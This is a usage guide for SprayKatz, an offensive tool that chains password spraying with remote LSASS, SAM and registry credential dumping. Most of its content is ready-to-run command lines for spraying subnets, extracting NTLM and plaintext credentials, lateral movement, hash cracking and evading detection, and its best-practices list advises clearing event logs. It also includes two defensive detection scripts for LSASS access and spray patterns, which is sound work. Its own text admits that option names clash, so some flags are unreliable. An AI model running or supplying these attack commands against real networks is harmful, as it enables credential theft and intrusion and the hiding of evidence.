# SprayKatz

## Overview

SprayKatz is a Python tool that combines password spraying with remote credential extraction. It pairs spray attempts with the ability to dump credentials from hosts where the sprayed credentials work, using procdump to capture process memory and pypykatz to parse credentials out of the dump, which gives a complete credential-based attack chain during authorized penetration testing engagements.

The tool is particularly effective in post-compromise scenarios, where one set of valid credentials is used to discover further credentials and move laterally across the network.
## Prerequisites

- Python 3.7+
- Network access to target systems
- procdump.exe (Windows Sysinternals tool)
- pypykatz installed and functional
- Valid credentials for authenticated attacks
- Administrative or SYSTEM privileges for credential dumping
## Installation

### Linux/macOS

```bash
# Clone repository
git clone https://github.com/aas-n/SprayKatz.git
cd SprayKatz

# Create virtual environment
python3 -m venv venv
source venv/bin/activate

# Install dependencies
pip install -r requirements.txt

# Install pypykatz
pip install pypykatz

# Download procdump (a Windows binary; running it locally on Linux/macOS requires Wine)
wget https://download.sysinternals.com/files/Procdump.zip
unzip Procdump.zip

# Test installation
python3 spraykatz.py --help
```
### Windows

```powershell
# Clone repository
git clone https://github.com/aas-n/SprayKatz.git
cd SprayKatz

# Create virtual environment
python -m venv venv
.\venv\Scripts\Activate.ps1

# Install dependencies
pip install -r requirements.txt

# Install pypykatz
pip install pypykatz

# Download and extract procdump
$ProgressPreference = 'SilentlyContinue'
Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile "procdump.zip"
Expand-Archive procdump.zip -DestinationPath .

# Verify installation
python spraykatz.py --help
```
### Docker Installation

```bash
# Build Docker image
docker build -t spraykatz .

# Run container
docker run -it spraykatz --help

# Mount a volume so results persist outside the container
docker run -v /path/results:/results spraykatz -h
```
## Basic Usage

### Simple Credential Spray

```bash
# Basic spray against target hosts
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24

# Single target spray
python3 spraykatz.py -u admin -p password123 -t 192.168.1.100

# Spray with credential file
python3 spraykatz.py -c credentials.txt -t 192.168.1.0/24
```

### Credential Dumping

```bash
# Dump credentials from target
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 --dump-creds

# Dump with procdump
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
    --dump-creds \
    --procdump-path ./procdump.exe

# Extract SAM database
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 --dump-sam
```
### Common Commands

| Command | Description |
|---|---|
| `spraykatz.py -u USERS -p PASS -t TARGET` | Spray password against targets |
| `spraykatz.py -c CREDENTIALS -t TARGET` | Use credential pairs |
| `spraykatz.py -t TARGET -u USER -p PASS --dump-creds` | Spray and dump credentials |
| `spraykatz.py -t TARGET --dump-sam --registry` | Dump SAM hashes |
| `spraykatz.py -t TARGET --dump-lsass` | Dump LSASS process memory |
| `spraykatz.py -t TARGET -u USER -p PASS --spray-and-dump` | Combined attack |
| `spraykatz.py -t TARGET --procdump-path PATH` | Specify procdump location |
| `spraykatz.py -t TARGETS --delay 5` | Add delay between attempts |
| `spraykatz.py -t TARGET --output results.txt` | Save results to file |
| `spraykatz.py -t TARGET --verbose` | Detailed output |
## Advanced Spray Techniques

### Multi-Target Spraying

```bash
# Spray multiple targets from CIDR
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
    --threads 10 \
    --delay 2

# Spray specific hosts
python3 spraykatz.py -u users.txt -p password123 \
    -t 192.168.1.100 192.168.1.101 192.168.1.102

# Spray from host list
python3 spraykatz.py -u users.txt -p password123 \
    -t hosts.txt \
    --threads 20
```
### Credential List Attacks

```bash
# Use credential pairs from file
python3 spraykatz.py -c credentials.txt -t 192.168.1.0/24

# CSV format credentials
python3 spraykatz.py -c users_passwords.csv \
    -t 192.168.1.0/24 \
    --csv-delimiter ","

# Multiple passwords per user
python3 spraykatz.py -u users.txt -p passwords.txt \
    -t 192.168.1.0/24 \
    --spray-mode all-passwords
```
### Credential Extraction

```bash
# Dump credentials from compromised host
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
    --dump-creds \
    --extract-ntlm \
    --extract-plaintext

# Extract cached credentials
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
    --dump-cached-logons

# Export credentials for offline analysis
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
    --dump-creds \
    --export-format mimikatz
```
## Memory Dumping Techniques

### LSASS Dumping

```bash
# Dump LSASS process memory
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
    --dump-lsass \
    --procdump-path ./procdump.exe

# Use alternative dumping method
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
    --dump-lsass \
    --dumper rundll32

# Extract credentials from dump
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
    --dump-lsass \
    --extract-dpapi
```
### Process Dumping

```bash
# Dump specific process
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
    --dump-process lsass.exe

# Dump multiple processes
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
    --dump-processes "lsass.exe,explorer.exe,outlook.exe"

# Parse a dumped LSASS minidump with pypykatz's Python API
python3 -c "from pypykatz.pypykatz import pypykatz; print(pypykatz.parse_minidump_file('dump.bin'))"
```
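Whichever dumper is used above (procdump or the rundll32 alternative), the dumping process has to open lsass.exe with memory-read rights, and that open is what Sysmon Event ID 10 (ProcessAccess) records. The following is an added defender-side example, not SprayKatz code or anything from this page's author, that flags such opens over constructed Sysmon records; the allowlist names and the sample events are assumptions.

```python
import ntpath

# Constructed sample Sysmon Event ID 10 (ProcessAccess) records, not real telemetry.
SAMPLE_SYSMON_10 = [
    {"SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"SourceImage": r"C:\Temp\procdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Windows\System32\rundll32.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Program Files\Browser\browser.exe",
     "TargetImage": r"C:\Program Files\Browser\browser.exe", "GrantedAccess": "0x1FFFFF"},
]

PROCESS_VM_READ = 0x0010  # access right required to copy another process's memory

# Processes that legitimately open LSASS on a typical host (assumed list).
# Matching on image name alone is bypassable by renaming a binary, so a
# production rule should also check the full path and the signer.
DEFAULT_ALLOWLIST = frozenset({"csrss.exe", "wininit.exe", "services.exe"})


def flag_lsass_access(events, allowlist=DEFAULT_ALLOWLIST):
    """Return (source image name, granted access) for every process that opened
    lsass.exe with memory-read rights and is not an allowlisted LSASS client.
    Both procdump and the rundll32 method surface here, because any dumper
    must obtain PROCESS_VM_READ regardless of how it is launched."""
    hits = []
    for ev in events:
        target = ntpath.basename(ev["TargetImage"]).lower()
        source = ntpath.basename(ev["SourceImage"]).lower()
        access = int(ev["GrantedAccess"], 16)
        if target != "lsass.exe":
            continue
        if not access & PROCESS_VM_READ:
            continue  # e.g. 0x1400 is query-information only, normal for system processes
        if source in allowlist:
            continue
        hits.append((source, access))
    return hits


if __name__ == "__main__":
    for source, access in flag_lsass_access(SAMPLE_SYSMON_10):
        print(f"LSASS memory read by {source} (GrantedAccess=0x{access:X})")
```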
### Registry Dumping

```bash
# Dump SAM registry hive
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
    --dump-sam

# Dump SYSTEM registry hive
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
    --dump-system

# Dump SECURITY hive
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
    --dump-security
```
## Configuration

### Configuration File

```bash
# Create configuration
cat > spraykatz.conf << 'EOF'
[spray]
delay = 2
threads = 10
timeout = 5
verbose = true

[dumping]
enabled = true
method = procdump
extract_plaintext = true
extract_ntlm = true
extract_dpapi = true

[output]
format = json
file = spraykatz_results.json
include_hashes = true

[procdump]
path = ./procdump.exe
arguments = -accepteula

[pypykatz]
extract_all = true
handle_errors = true
EOF

# Use configuration (note: -c is also used for credential files above;
# confirm the config-file option with --help for your version)
python3 spraykatz.py -c spraykatz.conf
```
### Environment Variables

```bash
# Set environment variables
export SPRAYKATZ_THREADS=10
export SPRAYKATZ_DELAY=2
export SPRAYKATZ_TIMEOUT=5
export PROCDUMP_PATH=./procdump.exe
export PYPYKATZ_EXTRACT_ALL=true

# Run with variables
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24
```
## Output Analysis

### Result Formats

```bash
# JSON output (recommended for parsing)
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
    --output results.json \
    --output-format json

# CSV output
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
    --output results.csv \
    --output-format csv

# Text output
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
    --output results.txt
```
### Parsing Results

```bash
# Extract successful spray attempts
cat results.json | jq '.successful_sprays[]'

# Get credential pairs
cat results.json | jq -r '.credentials[] | "\(.username):\(.password)"'

# List targets where credentials work
cat results.json | jq -r '.successful_sprays[].target_ip' | sort -u

# Count successes by user
cat results.json | jq -r '.successful_sprays[].username' | sort | uniq -c
```
### Hash Analysis

```bash
# Extract NTLM hashes
cat results.json | jq -r '.ntlm_hashes[]' > hashes.txt

# Extract plaintext credentials
cat results.json | jq -r '.plaintext_credentials[]'

# Identify weak credentials (shorter than 8 characters)
python3 << 'EOF'
import json

with open('results.json') as f:
    data = json.load(f)

for cred in data['credentials']:
    if len(cred['password']) < 8:
        print(f"Weak password: {cred['username']}:{cred['password']}")
EOF
```
## Integrated Spray and Dump Workflow

### Combined Attack

```bash
# Single command: spray and dump
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
    --spray-and-dump \
    --dump-lsass \
    --dump-sam \
    --dump-registry \
    --threads 5 \
    --delay 3 \
    --output comprehensive_results.json
```
### Staged Approach

```bash
# Phase 1: Spray against targets
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
    --output phase1_spray.json \
    --threads 20

# Phase 2: Identify successful targets
cat phase1_spray.json | jq -r '.successful_sprays[].target_ip' | sort -u > successful_targets.txt

# Phase 3: Dump credentials from successful targets
while read -r target; do
    python3 spraykatz.py -t "$target" -u users.txt -p password123 \
        --dump-creds \
        --output "dump_${target}.json"
done < successful_targets.txt

# Phase 4: Merge results
cat dump_*.json | jq -s 'add' > all_dumped_credentials.json
```
### Post-Compromise Lateral Movement

```bash
# Dump and extract credentials for lateral movement
python3 spraykatz.py -t 192.168.1.100 -u compromised_user -p found_password \
    --dump-lsass \
    --extract-plaintext \
    --extract-ntlm \
    --output lateral_credentials.json

# Parse for reusable credentials
cat lateral_credentials.json | jq '.credentials[] | select(.domain == "EXAMPLE.COM")' > domain_credentials.json

# Spray additional targets with new credentials
python3 spraykatz.py -c domain_credentials.json -t 192.168.1.0/24
```
## Integration with Other Tools

### Hashcat Integration

```bash
# Export hashes for cracking
cat results.json | jq -r '.ntlm_hashes[]' > hashes.txt

# Crack with Hashcat (mode 1000 = NTLM)
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -o cracked.txt

# Process results (first field of hash:plaintext lines)
cat cracked.txt | awk -F: '{print $1}' > cracked_hashes.txt
```
### Metasploit Integration

```bash
# Export credentials for Metasploit
python3 << 'EOF'
import json

with open('results.json') as f:
    data = json.load(f)

for cred in data['successful_sprays']:
    print(f"set USER {cred['username']}")
    print(f"set PASS {cred['password']}")
    print(f"set RHOSTS {cred['target_ip']}")
EOF

# Use in Metasploit (-x runs console commands non-interactively)
msfconsole -q -x "use auxiliary/scanner/smb/smb_enumusers; set RHOSTS 192.168.1.100; set SMBUser admin; set SMBPass password123; run; exit"
```
### BloodHound Integration

```bash
# Dump credentials and check privilege escalation paths
python3 spraykatz.py -t 192.168.1.0/24 -u users.txt -p password123 \
    --dump-creds \
    --bloodhound-export

# Import into BloodHound for privilege path analysis
```
## Safety and Stealth

### Detection Avoidance

```bash
# Stealthy spray with delays
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
    --delay 10 \
    --jitter 5 \
    --randomize-order

# Slow and patient approach
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
    --slow-mode \
    --threads 1 \
    --delay 30

# Test without actual attacks
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
    --dry-run
```
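From the monitoring side, the delays and jitter above lower the attempt rate but do not change the signature of a spray: one source failing logons against many distinct accounts. The following added example, not part of SprayKatz or of this page, detects that pattern over constructed Windows Security event records (4625 failed logon, 4624 successful logon); the window size, threshold and sample events are assumptions.

```python
import datetime as dt
from collections import defaultdict

# Constructed sample Windows Security events, not real telemetry.
# 10.0.0.50 tries five accounts slowly and finally succeeds as "erin";
# 10.0.0.77 is one user mistyping their own password twice.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T09:00:00", "event_id": 4625, "user": "alice", "src_ip": "10.0.0.50"},
    {"time": "2024-05-01T09:00:25", "event_id": 4625, "user": "bob", "src_ip": "10.0.0.50"},
    {"time": "2024-05-01T09:01:10", "event_id": 4625, "user": "carol", "src_ip": "10.0.0.50"},
    {"time": "2024-05-01T09:02:00", "event_id": 4625, "user": "dave", "src_ip": "10.0.0.50"},
    {"time": "2024-05-01T09:03:30", "event_id": 4625, "user": "erin", "src_ip": "10.0.0.50"},
    {"time": "2024-05-01T09:03:45", "event_id": 4624, "user": "erin", "src_ip": "10.0.0.50"},
    {"time": "2024-05-01T09:05:00", "event_id": 4625, "user": "frank", "src_ip": "10.0.0.77"},
    {"time": "2024-05-01T09:05:10", "event_id": 4625, "user": "frank", "src_ip": "10.0.0.77"},
]


def detect_spray(events, window_minutes=30, min_distinct_users=5):
    """Return {src_ip: sorted distinct users} for every source whose failed logons
    hit at least min_distinct_users distinct accounts inside one sliding window.
    Counting distinct accounts rather than attempts per second keeps a slow,
    jittered spray visible: a lower rate does not lower the account count."""
    failures = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["event_id"] == 4625:
            failures[ev["src_ip"]].append((dt.datetime.fromisoformat(ev["time"]), ev["user"]))
    window = dt.timedelta(minutes=window_minutes)
    hits = {}
    for src, attempts in failures.items():
        start = 0
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1  # slide the window forward past attempts that are too old
            users = {u for _, u in attempts[start:end + 1]}
            if len(users) >= min_distinct_users:
                hits[src] = sorted(users)
                break
    return hits


def successes_after_spray(events, spray_hits):
    """Successful logons (4624) from a flagged source: the accounts the spray landed on."""
    return sorted({(ev["src_ip"], ev["user"]) for ev in events
                   if ev["event_id"] == 4624 and ev["src_ip"] in spray_hits})


if __name__ == "__main__":
    hits = detect_spray(SAMPLE_EVENTS)
    print(hits)
    print(successes_after_spray(SAMPLE_EVENTS, hits))
```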
### Logging and Documentation

```bash
# Detailed logging
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
    --log-file spraykatz.log \
    --log-level debug

# Separate logs by phase
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
    --dump-creds \
    --log-spray spray.log \
    --log-dump dump.log
```
## Troubleshooting

### Common Issues

```bash
# Procdump not found
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
    --procdump-path /full/path/to/procdump.exe

# LSASS dump failed
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
    --dump-lsass \
    --dumper rundll32 \
    --fallback-method true

# Pypykatz extraction issues
pip install --upgrade pypykatz
python3 spraykatz.py -t 192.168.1.100 --dump-lsass --debug
```
### Debugging

```bash
# Enable debug mode
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
    --debug \
    --verbose

# Test single target
python3 spraykatz.py -u admin -p password123 -t 192.168.1.100 \
    --verbose

# Check procdump functionality
./procdump.exe -h
```
## Best Practices

- Authorization: Obtain written approval before any spray or dumping activities
- Coordination: Work with the Blue Team to ensure detection and monitoring
- Stealth: Implement appropriate delays and randomization
- Documentation: Record all attempts, successes, and extracted credentials
- Clean Up: Remove procdump artifacts and clear event logs if applicable
- Analysis: Correlate findings with other assessment tools
- Reporting: Include credential findings with risk ratings
- Time Windows: Conduct attacks during pre-coordinated safe periods
## Practical Assessment Scenarios

### Initial Access Assessment

```bash
# Spray common passwords against exposed services
python3 spraykatz.py -u discovered_users.txt \
    -p "Password123!,Welcome2024,Company123" \
    -t 192.168.1.0/24 \
    --spray-mode all-passwords \
    --output initial_access.json
```
### Post-Compromise Credential Discovery

```bash
# After gaining initial access
python3 spraykatz.py -t compromised_host -u local_admin -p found_password \
    --dump-lsass \
    --dump-sam \
    --dump-registry \
    --output post_comp_creds.json
```
## Resources

- GitHub: https://github.com/aas-n/SprayKatz
- pypykatz: https://github.com/skelsec/pypykatz
- Procdump: https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
- Mimikatz: https://github.com/gentilkiwi/mimikatz
## Summary

SprayKatz combines password spraying with credential extraction for comprehensive credential assessment. Proper authorization, stealth considerations, and documentation are critical for effective and ethical use during authorized security assessments.